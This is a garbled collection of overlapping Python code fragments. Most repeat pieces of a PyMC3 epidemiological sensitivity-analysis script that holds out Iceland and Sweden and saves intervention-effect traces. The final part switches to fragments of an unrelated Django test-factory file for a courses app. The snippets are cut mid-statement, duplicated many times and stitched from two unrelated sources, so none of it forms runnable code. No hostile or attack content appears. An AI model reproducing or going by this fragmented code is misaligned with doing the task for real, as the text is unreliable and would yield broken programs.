"os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser()",
"nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales)",
"os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ ==",
"generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) +",
"'1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__",
"'1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args()",
"import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] =",
"pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace =",
"if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type)",
"os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser)",
"= get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag')",
"model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag,",
"= '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if",
"pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse",
"save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace =",
"both iceland and sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters",
"= EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as",
"= get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta",
"import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser =",
"args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction)",
"parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS,",
"with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples,",
"preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters()",
"epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os",
":code:`iceswe.py` Holdout both iceland and sweden \"\"\" import pymc3 as pm from epimodel",
"= argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data =",
"data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)}",
"chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS,",
"full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag, generate_base_output_dir(args.model_type,",
"get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta =",
"= pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))",
"as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains,",
"= np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))",
"tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects:",
"as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import",
"scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] =",
"add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30')",
"argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(),",
"data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with",
"from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS']",
"pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if",
"= '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__':",
"= preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep =",
"model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type,",
"argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE')",
"max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs =",
"EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model:",
"data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep",
"ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta,",
"import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1'",
"data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd)",
"import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS']",
"sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import",
"pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle",
"with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction,",
"init='adapt_diag') save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace",
"model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag,",
"argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS']",
"= argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS')",
"from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from",
"'__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in",
"import pymc3 as pm from epimodel import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import",
"model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd)",
"= model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt', full_trace,",
"args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only' in args.model_type:",
"== '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings() if 'deaths_only'",
"if __name__ == '__main__': args, extras = argparser.parse_known_args() data = preprocess_data(get_data_path(), last_day='2020-05-30') data.mask_reopenings()",
"data.mask_reopenings() if 'deaths_only' in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class =",
"nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales) save_cm_trace('iceswe-cs.txt',",
"get_target_accept_from_model_str(args.model_type) with model.model: model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag') save_cm_trace(f'iceswe.txt',",
"'1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser = argparse.ArgumentParser() add_argparse_arguments(argparser) if __name__ == '__main__': args,",
"iceland and sweden \"\"\" import pymc3 as pm from epimodel import EpidemiologicalParameters from",
"if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp( np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs))",
"in args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd =",
"**parse_extra_model_args(extras)} pprint_mb_dict(bd) with model_class(data) as model: model.build_model(**bd) ta = get_target_accept_from_model_str(args.model_type) with model.model: model.trace",
"import EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import",
"import argparse import pickle from scripts.sensitivity_analysis.utils import * import os os.environ['OMP_NUM_THREADS'] = '1'",
"EpidemiologicalParameters from epimodel.preprocessing.data_preprocessor import preprocess_data import argparse import pickle from scripts.sensitivity_analysis.utils import *",
"args.model_type: data.remove_regions_min_deaths(5) data.mask_region('IS') data.mask_region('SE') ep = EpidemiologicalParameters() model_class = get_model_class_from_str(args.model_type) bd = {**ep.get_model_build_dict(),",
"* import os os.environ['OMP_NUM_THREADS'] = '1' os.environ['MKL_NUM_THREADS'] = '1' os.environ['OPENBLAS_NUM_THREADS'] = '1' argparser",
"model.trace.CMReduction, args.exp_tag, generate_base_output_dir(args.model_type, parse_extra_model_args(extras))) if model.country_specific_effects: nS, nCMs = model.trace.CMReduction.shape full_trace = np.exp("
] |
[
"from django import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not",
"<reponame>Netromnik/python from django import template register = template.Library() @register.filter('modF') def modF(value, arg): print",
"template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return",
"template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not (int( value)%int(arg))",
"register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not",
"django import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int(",
"= template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg))) return not (int(",
"import template register = template.Library() @register.filter('modF') def modF(value, arg): print (not (int( value)%int(arg)))"
] |
[
"range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y],",
"list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x]",
"def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] >",
"y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2])",
"range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 =",
"class Small_Number: def __init__(self, list): self.list = list def sma(self): for x in",
"= list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if",
"self.list = list def sma(self): for x in range(len(self.list)): for y in range(len(self.list)):",
"<filename>small_number.py class Small_Number: def __init__(self, list): self.list = list def sma(self): for x",
"in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1",
"if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 = Small_Number([1,2,-8,-2,0,-2])",
"in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] =",
"__init__(self, list): self.list = list def sma(self): for x in range(len(self.list)): for y",
"list): self.list = list def sma(self): for x in range(len(self.list)): for y in",
"for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x],",
"for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x]",
"Small_Number: def __init__(self, list): self.list = list def sma(self): for x in range(len(self.list)):",
"self.list[x] > self.list[y]: self.list[x], self.list[y] = self.list[y], self.list[x] print(self.list[-2]) s1 = Small_Number([1,2,-8,-2,0,-2]) s1.sma()",
"def __init__(self, list): self.list = list def sma(self): for x in range(len(self.list)): for",
"sma(self): for x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]:",
"x in range(len(self.list)): for y in range(len(self.list)): if self.list[x] > self.list[y]: self.list[x], self.list[y]"
] |
[
"min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num in",
"reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) / 2 else:",
"Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0,",
"num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num])",
"cut = len(arr) / 2 else: cut = len(arr + 1) / 2",
"if len(arr) % 2 == 0: cut = len(arr) / 2 else: cut",
"= len(arr + 1) / 2 for count in counts: min_size += 1",
"else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if",
"{}, [], 0, len(arr) for num in arr: if num in num_to_count: num_to_count[num]",
"= 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) %",
"1) / 2 for count in counts: min_size += 1 current_length -= count",
"counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr)",
"= {}, [], 0, len(arr) for num in arr: if num in num_to_count:",
"= reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) / 2",
"for num in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num]",
"len(arr) for num in arr: if num in num_to_count: num_to_count[num] += 1 else:",
"/ 2 for count in counts: min_size += 1 current_length -= count if",
"+= 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts =",
"min_size, current_length = {}, [], 0, len(arr) for num in arr: if num",
"len(arr) % 2 == 0: cut = len(arr) / 2 else: cut =",
"Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length",
"+ 1) / 2 for count in counts: min_size += 1 current_length -=",
"counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) /",
"for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 ==",
"Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [],",
"len(arr) / 2 else: cut = len(arr + 1) / 2 for count",
"if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num",
"''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size,",
"/ 2 else: cut = len(arr + 1) / 2 for count in",
"num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr)",
"num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0:",
"1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2",
"num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut =",
"# https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count,",
"for count in counts: min_size += 1 current_length -= count if current_length <=",
"count in counts: min_size += 1 current_length -= count if current_length <= cut:",
"O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr)",
"[], 0, len(arr) for num in arr: if num in num_to_count: num_to_count[num] +=",
"1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts))",
"% 2 == 0: cut = len(arr) / 2 else: cut = len(arr",
"== 0: cut = len(arr) / 2 else: cut = len(arr + 1)",
"num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in",
"+= 1 current_length -= count if current_length <= cut: return min_size return min_size",
"def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num",
"counts: min_size += 1 current_length -= count if current_length <= cut: return min_size",
"in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count:",
"current_length = {}, [], 0, len(arr) for num in arr: if num in",
"num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num in arr:",
"= len(arr) / 2 else: cut = len(arr + 1) / 2 for",
"else: cut = len(arr + 1) / 2 for count in counts: min_size",
"<reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py # https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr):",
"Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length =",
"https://leetcode.com/problems/reduce-array-size-to-the-half ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts,",
"O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {},",
"in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut",
"in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1",
"len(arr + 1) / 2 for count in counts: min_size += 1 current_length",
"2 for count in counts: min_size += 1 current_length -= count if current_length",
"counts, min_size, current_length = {}, [], 0, len(arr) for num in arr: if",
"0, len(arr) for num in arr: if num in num_to_count: num_to_count[num] += 1",
"2 else: cut = len(arr + 1) / 2 for count in counts:",
"num in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] =",
"min_size += 1 current_length -= count if current_length <= cut: return min_size return",
"num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts",
"cut = len(arr + 1) / 2 for count in counts: min_size +=",
"''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for",
"0: cut = len(arr) / 2 else: cut = len(arr + 1) /",
"2 == 0: cut = len(arr) / 2 else: cut = len(arr +",
"in counts: min_size += 1 current_length -= count if current_length <= cut: return",
"arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for"
] |
[] |
[
"for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for teacher in",
"= factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not",
"end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup course =",
"factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100),",
"= factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory) grade = factory.SubFactory(GradeFactory) code_meu = '123' has_exam =",
"import models as users_models PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES =",
"fuzzy.FuzzyDate(datetime.date.today()) class AssignmentFactory(factory.django.DjangoModelFactory): class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher =",
"class Meta: model = models.Assignment laboratory = factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline =",
"factory.Faker('text') course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class",
"from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES from tests.users import factories as users_factories from users",
"in random_students: self.students.add(student) class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda",
"range(1, 40)]) labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) @factory.post_generation def teachers(self,",
"as fuzzy from django.core.files.base import ContentFile from courses import models from courses.models import",
"if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers = random.choices(users_models.Teacher.objects.all(), k=5) for",
"name = factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher =",
"fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name =",
"- datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup",
"factory.SubFactory(LabFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) deadline = fuzzy.FuzzyDate(datetime.date.today()) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text')",
"factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content = factory.Faker('text') created_at = fuzzy.FuzzyDate(datetime.date.today())",
"course = factory.SubFactory(CourseFactory) student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class NoticeFactory(factory.django.DjangoModelFactory): class Meta:",
"class NoticeFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory)",
"= '123' has_exam = False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)])",
"if not create: return if extracted: for teacher in extracted: self.teachers.add(teacher) else: random_teachers",
"model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create, extracted, **kwargs): if",
"= models.CourseNotice course = factory.SubFactory(CourseFactory) sender = factory.SubFactory(users_factories.TeacherFactory) title = fuzzy.FuzzyText(length=16) content =",
"= [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade",
"PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in",
"Meta: model = models.Grade name = factory.Sequence(lambda n: \"Grade %03d\" % n) start_year",
"= factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class",
"start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create,",
"8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)]) labs_hours",
"Meta: model = models.CourseMark mark = 65 date = fuzzy.FuzzyDate(datetime.date.today()) description = factory.Faker('text')",
"[x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class Meta: model = models.Grade name",
"= fuzzy.FuzzyText(length=16) content = factory.Faker('text') class CourseFileFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseFile name",
"models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate(",
"class CourseFactory(factory.django.DjangoModelFactory): class Meta: model = models.Course name = factory.Sequence(lambda n: \"Course %02d\"",
"extracted: for student in extracted: self.students.add(student) class LabFactory(factory.django.DjangoModelFactory): class Meta: model = models.Laboratory",
"profile = fuzzy.FuzzyChoice(PROFILE_CHOICES) @factory.post_generation def students(self, create, extracted, **kwargs): if not create: return",
"= factory.Sequence(lambda n: \"Course %02d\" % n) description = factory.Faker('text') head_teacher = factory.SubFactory(users_factories.TeacherFactory)",
"i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES) lecture_hours = fuzzy.FuzzyChoice([i for i in",
"if extracted: for student in extracted: self.students.add(student) else: random_students = random.choices(users_models.Student.objects.all(), k=10) for",
"factory.Sequence(lambda n: \"Grade %03d\" % n) start_year = factory.Faker('date_object') supervisor = factory.SubFactory(users_factories.StudentFactory) profile",
"LectureFactory(factory.django.DjangoModelFactory): class Meta: model = models.Lecture course = factory.SubFactory(CourseFactory) title = fuzzy.FuzzyText(length=16) description",
"= False semester = fuzzy.FuzzyChoice([i for i in range(1, 8)]) language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES)",
"student = factory.SubFactory(users_factories.StudentFactory) teacher = factory.SubFactory(users_factories.TeacherFactory) class FinalCourseMarkFactory(factory.django.DjangoModelFactory): class Meta: model = models.FinalCourseMark",
"datetime import random import factory import factory.fuzzy as fuzzy from django.core.files.base import ContentFile",
"= factory.SubFactory(CourseFactory) group = factory.SubFactory(GroupFactory) title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date =",
"title = fuzzy.FuzzyText(length=16) description = factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today()",
"GroupFactory(factory.django.DjangoModelFactory): class Meta: model = models.CourseGroup name = fuzzy.FuzzyText(length=16) @factory.post_generation def students(self, create,",
"x in PROFILE_CHOICES] LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES] class GradeFactory(factory.django.DjangoModelFactory): class",
"factory.Faker('text') date = fuzzy.FuzzyDate( start_date=datetime.date.today() - datetime.timedelta(days=100), end_date=datetime.date.today() + datetime.timedelta(days=100), ) class CourseGroupFactory(factory.django.DjangoModelFactory):",
